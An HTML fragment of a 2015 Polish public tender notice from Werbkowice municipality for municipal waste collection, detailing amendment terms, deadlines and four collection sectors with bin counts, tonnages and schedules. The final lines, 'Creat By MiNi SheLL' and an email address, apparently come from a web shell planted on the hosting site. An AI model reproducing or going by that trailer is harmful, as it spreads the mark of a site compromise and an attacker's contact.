<p>Zamawiający - na podstawie art. 144 ust. 1 ustawy PZP - zastrzega sobie prawo do zmiany treści istotnych postanowień umowy wskutek wystąpienia okoliczności, których nie dało się przewidzieć na etapie postępowania o udzielenie zamówienia i na etapie podpisywania umowy lub wystąpienie których nie zależy od woli stron umowy w sprawie zamówienia publicznego;
W szczególności warunki zmiany umowy obejmują:
1) zmianę kwoty cen jednostkowych - w przypadku urzędowej zmiany podatku VAT pod warunkiem pisemnego złożenia Wniosku przez Wykonawcę z zastrzeżeniem, że możliwa jest zmiana tylko kwoty umownej brutto (kwota umowna netto wynikająca z oferty musi pozostać bez zmian) o różnicę w podatku VAT między stawką obowiązującą w dniu składania ofert a stawką nowo wprowadzoną urzędowo.
2) zmianę terminów świadczenia usług wywozu określonych w harmonogramie w przypadku wystąpienia okoliczności, których nie można było przewidzieć (m.in. ekstremalnych warunków atmosferycznych, klęsk żywiołowych itp.). Zmiana umowy w tym zakresie wymaga zgłoszenia przez Wykonawcę z uzasadnieniem i wyrażenia zgody przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ww.bip.werbkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Werbkowice ul. Zamojska 1, 22-550 Werbkowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2015 godzina 10:00, miejsce: Urząd Gminy Werbkowice ul. Zamojska 1, 22-550 Werbkowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sektor I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sektor ten obejmuje w miejscowości Werbkowice:
- zabudowę wielorodzinną: Spółdzielni Mieszkaniowej Cukrownik zlokalizowaną przy ul. Konopnickiej: blok Nr 4,5,6,7,8, przy ul. Szkolnej: blok Nr 8, 9,10, przy ul. Piłsudskiego: blok Nr 3 i przy ul. Przemysłowej blok Nr 1,
- zabudowę wielorodzinną Wspólnoty Mieszkaniowej przy ul. Jana Pawła II blok Nr 12 i 14 . 
Na terenie tego sektora występuje tylko zabudowa wielorodzinna, obowiązywać będzie system pojemnikowo - kontenerowy zbiórki odpadów komunalnych.
Zmieszane odpady komunalne gromadzone będą w pojemnikach 1100l szt. 26 i kontenerach Kp7 szt.4 ustawionych w miejscach utwardzonych lub altanach śmietnikowych. Selektywna zbiórka odpadów komunalnych na terenie zabudowy wielorodzinnej odbywać się będzie do specjalistycznych pojemników 1100 l oznaczonych kolorami: zielony, niebieski, żółty.
Częstotliwość wywozu - min 1 raz na dwa tygodnie lub w przypadku Kontenera Kp- 7  na każde telefoniczne zgłoszenie. Częstotliwość odbioru odpadów budowlanych-na telefoniczne zgłoszenie.
Szacunkowa ilość wytworzonych odpadów:
odpadów zmieszanych  - 200  Mg
odpadów selektywnych  - 60 Mg
odpadów budowlanych  -  10 Mg
Ilość mieszkańców w sektorze : ok.  763
Ilość pojemników kontenerów Kp- 7 na odpady zmieszane  przeznaczona do opróżniania: 
3 szt  - Spółdzielnia Mieszkaniowa Cukrownik 
1 szt. - Bloki Jana Pawła II
Ilość pojemników 1100l  na odpady zmieszane  przeznaczone do opróżniania: 26 szt. -
Ilość pojemników  na odpady selektywnie zebrane szkło, plastik, papier : 
2 szt. Kp-7  l - Spółdzielnia Mieszkaniowa Cukrownik 
4  szt. 1100 l - Spółdzielnia Mieszkaniowa Cukrownik 
3 szt. 1100l - bloki Jana Pawła II
2 szt.1100l  -  ul. Przemysłowa 
Szczegółowe rozmieszczenie pojemników do selektywnej zbiórki 1100l  zawiera załącznik Nr 11 do SIWZ.
Przedmiotem zamówienia w tym sektorze będzie także zorganizowanie przez Wykonawce zbiórki zużytego sprzętu elektrycznego i elektronicznego zgodnie z opisem w pkt. I.4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas reakcji na zgłoszenie usterki lub reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sektor II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje pozostałe nieruchomości zamieszkałe miejscowości Werbkowice.
Do tego sektora zaliczamy ulice: Parkowa, Piłsudskiego ( bez bloku nr 3), Jana Pawła II ( bez bloku 12 i 14), Sienkiewicza, Wspólna, Kryształowa, Kopernika, Mickiewicza, Partyzantów, Szkolna,  Prusa, Wojska Polskiego, Reja, Kolejowa, 3-go Maja, Sikorskiego, Kościuszki, Staszica, Polna, Ks. Klingiera, Pogodna, Słoneczna, Krótka, Poprzeczna, Buczyńskiego, Piotra Skargi, Zamojska, Przemysłowa ( bez bloku Nr 1). W sektorze tym obowiązuje system mieszany workowo - pojemnikowy zbiórki odpadów komunalnych. Zmieszane odpady komunalne gromadzone będą w pojemnikach 80-120 l, 1100 l blok Agronomówka szt. 2 i w kontenerze Kp-7 - szt. 1 (przy ul. Przemysłowej) zaś selektywne w workach i pojemnikach 1100l.  
Ustawienie poj. 1100L w tym sektorze  przedstawia załącznik do SIWZ.
Szacunkowa ilość wytworzonych odpadów:
odpadów  zmieszanych   - 190 Mg
odpadów selektywnych - 50 Mg
odpadów budowlanych  -  10 Mg
Ilość mieszkańców w sektorze: ok. 1200
Ilość gospodarstw domowych - 500 
Ilość budynków jednorodzinnych przewidywana do obsługi:480, wielorodzinnych: 10 
Ilość pojemników 1100 l na selektywną zbiórkę - 17 szt. Szczegółowe rozmieszczenie pojemników do selektywnej zbiórki 1100l  zawiera załącznik Nr 12 do SIWZ.
Ilość pojemników kontenerów Kp- 7 na odpady zmieszane przeznaczona do opróżniania:1 szt. (ul. Przemysłowa, ).
Częstotliwość wywozu przez Wykonawcę odpadów zmieszanych z 110 l i 1100l  - 1 raz na miesiąc. Z kontenera KP-7 na zgłoszenie telefoniczne Zamawiającego. 
Częstotliwość odbioru przez Wykonawcę odpadów selektywnych gromadzonych w workach - 1 raz na miesiąc zgodnie z harmonogramem.
Częstotliwość opróżniania pojemników do selektywnej zbiórki 1100l - na telefoniczne zgłoszenie Zamawiającego.
Częstotliwość odbioru odpadów budowlanych - na telefoniczne zgłoszenie Zamawiającego.
Przedmiotem zamówienia w tym sektorze będzie także zorganizowanie przez Wykonawcę zbiórki zużytego sprzętu elektrycznego i elektronicznego zgodnie z opisem w pkt. I.4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas reakcji na zgłoszenie usterki lub reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> SEKTOR III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obejmujący sołectwa: Adelina, Sahryń, Sahryń Kolonia, Zagajnik; Turkowice,Wronowice, Terebiniec, Terebiń, Terebiń Kolonia, Gozdów, Alojzów, Podhorce. 
Na terenie tego sektora obowiązywał będzie system mieszany workowo - pojemnikowy zbiórki odpadów komunalnych. Zmieszane odpady komunalne gromadzone będą w pojemnikach 80-120, oraz w kontenerach Kp-7 szt. 3 i pojemnikach 1100 l szt.3 ( zabudowa wielorodzinna wsi Turkowice blok 132 ,130 i 125 ) zaś selektywne w workach i pojemnikach 1100 l. Ilość pojemników 1100 l na selektywną zbiórkę - 26 szt. 
Szacunkowa ilość wytworzonych odpadów:
odpadów zmieszanych -220 Mg
odpadów selektywnych - 70 Mg
odpadów budowlanych  -  10 Mg
odpadów wielkogabarytowych z PSZOK- 10 Mg
Wykonawca zobowiązany jest także w tym sektorze do odbierania odpadów wielkogabarytowych (zużytych mebli) z Punktu Selektywnej Zbiórki Odpadów zlokalizowanego w m. Sahryń - na zgłoszenie telefoniczne Zamawiającego.
Ilość budynków jednorodzinnych przewidywana do obsługi: 900, wielorodzinnych 19 
Ilość mieszkańców w sektorze - ok. 2900
Szczegółowe rozmieszczenie pojemników do selektywnej zbiórki 1100 l zawiera załącznik Nr 13 do SIWZ.
Częstotliwość wywozu przez Wykonawcę odpadów zmieszanych - 1 raz na miesiąc.
Częstotliwość wywozu przez Wykonawcę odpadów selektywnych gromadzonych w workach - 1 raz na miesiąc zgodnie z harmonogramem. Częstotliwość opróżniania pojemników do selektywnej zbiórki 1100 l - na telefoniczne zgłoszenie Zamawiającego.
Czestotliwość odbioru odpadów budowlanych - na telefoniczne zgłoszenie.
Przedmiotem zamówienia w tym sektorze będzie także zorganizowanie przez Wykonawcę zbiórki zużytego sprzętu elektrycznego i elektronicznego zgodnie z opisem w pkt. I.4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas reakcji na zgłoszenie usterki lub reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> SEKTOR IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obejmujący sołectwa: Dobromierzyce, Hostynne, Hostynne Kolonia, Honiatycze, Honiatycze Kolonia, Honiatyczki, Konopne, Kotorów, Łysa Góra, Łotów, Malice, Strzyżowiec, Wilków, Wilków Kolonia, Peresołowice. Na terenie tego sektora obowiązywał będzie system mieszany workowo - pojemnikowy zbiórki odpadów komunalnych. Zmieszane odpady komunalne gromadzone będą w pojemnikach 80-120 l,  zaś selektywne w workach i pojemnikach 1100 l. 
Szacunkowa ilość wytworzonych odpadów: 
odpadów zmieszanych -  150 Mg.
odpadów selektywnych  - 70 Mg
odpadów budowlanych  -  10 Mg
odpadów wielkogabarytowych z PSZOK - 10 Mg
Wykonawca zobowiązany jest także w tym sektorze do odbierania odpadów wielkogabarytowych (zużytych mebli) z Punktu Selektywnej Zbiórki Odpadów zlokalizowanego w m. Hostynne - na zgłoszenie telefoniczne Zamawiającego.
Ilość budynków jednorodzinnych przewidywana do obsługi: 850
Ilość mieszkańców w sektorze: ok. 2300
Ilość pojemników 1100 l na selektywną zbiórkę -22 szt. Szczegółowe rozmieszczenie pojemników do selektywnej zbiórki 1100 l  zawiera załącznik Nr 14 do SIWZ.
Częstotliwość wywozu przez Wykonawcę odpadów zmieszanych - 1 raz na miesiąc.
Częstotliwość wywozu przez Wykonawcę odpadów selektywnych gromadzonych w workach 120 l  - 1 raz na miesiąc  zgodnie z  harmonogramem.  
Częstotliwość opróżniania pojemników 1100 l - do selektywnej zbiórki - na telefoniczne zgłoszenie Zamawiającego.
Częstotliwość  odbioru odpadów budowlanych - na telefoniczne zgłoszenie Zamawiającego.
Przedmiotem zamówienia w tym sektorze będzie także zorganizowanie przez Wykonawcę   zbiórki zużytego sprzętu elektrycznego i elektronicznego zgodnie z opisem w pkt. I.4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas reakcji na zgłoszenie usterki lub reklamacji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com